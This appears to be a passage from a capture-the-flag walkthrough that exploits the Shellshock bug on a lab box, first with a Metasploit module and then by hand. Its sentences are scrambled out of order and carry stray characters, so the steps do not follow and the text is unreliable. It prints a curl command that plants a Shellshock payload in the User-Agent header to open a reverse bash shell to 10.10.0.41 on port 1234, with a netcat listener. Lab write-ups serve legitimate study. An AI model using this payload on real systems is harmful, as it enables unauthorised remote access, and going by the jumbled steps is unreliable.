![]() Now let’s see what’s available on this box to escalate our privileges and get root. We have our initial low privileged shell. On our netcat listener we have a reverse shell as the www-data user. I’ll setup a Netcat listener on port 1234 and then use curl to craft the HTTP request.Ĭurl -H ‘User-Agent: () /bin/bash -i >& /dev/tcp/10.10.0.41/1234 0>&1’ nc -lvnp 1234 We’ll use a simple ping command executed after the environmental variable is setup, and the arbitrary command. The first part of the article explains how to test for the vulnerability. Symantec – ShellshockĪfter some googling I landed on this post which provided a helpful walk through for testing and exploiting Shellshock. I found this graphic from Symantec helpful. So we’ve got a shell the easy way with Metasploit now let’s try and do it by exploiting Shellshock manually.īefore we get any further let’s understand how Shellshock works. You can skip ahead if you wish but I recommend trying the manual route. We’ll need to escalate our privileges to get root on this system. use exploit/multi/http/apache_mod_cgi_bash_env_exec This is the second one down in our search results, because the first is an auxiliary module which will not result in a shell. This time I’ll search for the exact CVE number we discovered earlier with Nikto. So fire up msfconsole and let’s do a search. ![]() There’s several exploits available including Metasploit modules.
0 Comments
Leave a Reply. |